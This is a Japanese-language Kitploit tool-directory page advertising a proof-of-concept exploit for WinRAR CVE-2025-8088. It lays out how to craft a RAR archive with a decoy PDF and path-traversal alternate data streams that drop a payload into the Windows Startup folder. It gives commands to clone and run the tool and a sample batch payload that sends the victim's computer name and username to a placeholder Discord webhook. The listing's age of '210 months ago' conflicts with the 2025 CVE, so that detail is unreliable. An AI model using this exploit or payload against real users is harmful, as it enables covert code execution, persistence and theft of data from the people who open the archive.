Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-8088-Exploit — WinRARの脆弱性(CVE-2025-8088)の概念実証エクスプロイトで、バージョン7.12以下に影響します。このツールは、ペイロードをパストラバーサルを伴う代替データストリーム(ADS)に埋め込む悪意のあるRARアーカイブを作成し、任意のコード実行につながる可能性があります。 | Kitploit
ツール/GitHubGitHub/techcorp/cve-2025-8088-exploit
ペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングバイナリエクスプロイト
GitHubtechcorp/cve-2025-8088-exploit

CVE-2025-8088-Exploit

WinRARの脆弱性(CVE-2025-8088)の概念実証エクスプロイトで、バージョン7.12以下に影響します。このツールは、ペイロードをパストラバーサルを伴う代替データストリーム(ADS)に埋め込む悪意のあるRARアーカイブを作成し、任意のコード実行につながる可能性があります。

リポジトリを見る
210ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-8088 WinRARエクスプロイト 🔓

WinRARの脆弱性(CVE-2025-8088)の概念実証エクスプロイトで、バージョン7.12以下に影響します。このツールは、悪意のあるRARアーカイブを作成し、ペイロードを代替データストリーム(ADS)にパストラバーサルを伴って埋め込み、任意のコード実行につながる可能性があります。

  • 他の多くのエクスプロイトの問題点は、複数のADSストリームを埋め込んでおらず、正しいパストラバーサルを偶然見つけるか、正確なユーザー名/展開ディレクトリを知っている必要があることです。

🚀 動作の仕組み

  1. おとりのドキュメント作成 📄 - プロフェッショナルなPDF(履歴書やペネトレーションテストレポート)を生成
  2. 複数のADSストリームを埋め込み 🔄 - 異なるパストラバーサル深度でペイロードストリームを添付
  3. RARヘッダーの操作 ⚙️ - パストラバーサルの脆弱性を悪用するためにアーカイブ構造を変更
  4. 起動フォルダへのペイロードドロップ 📂 - 展開時にWindowsのスタートアップフォルダにペイロードを書き込もうとする

🛠️ 使い方

root@kitploit:~
# リポジトリをクローン
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088

# 依存関係をインストール
pip install reportlab

# エクスプロイトを実行
python CVE-2025-8088.py

✏️ ペイロードのカスタマイズ

ペイロードを編集してDiscord Webhookを呼び出す:

root@kitploit:~
# スクリプト内のPAYLOAD変数を置き換える:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

YOUR_DISCORD_WEBHOOK_URLを実際のWebhook URLに置き換えてください。

🔄 実行フロー

  1. 被害者が脆弱なWinRAR(≤7.12)でRARファイルを展開
  2. ペイロードがスタートアップフォルダに書き込まれる:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. 次回の再起動後 ➡️ ペイロードが自動実行される

📋 要件

  • Windows OS 🪟
  • Python 3.x 🐍
  • WinRARがインストールされていること
  • ReportLabライブラリ(pip install reportlab)
ツールをダウンロード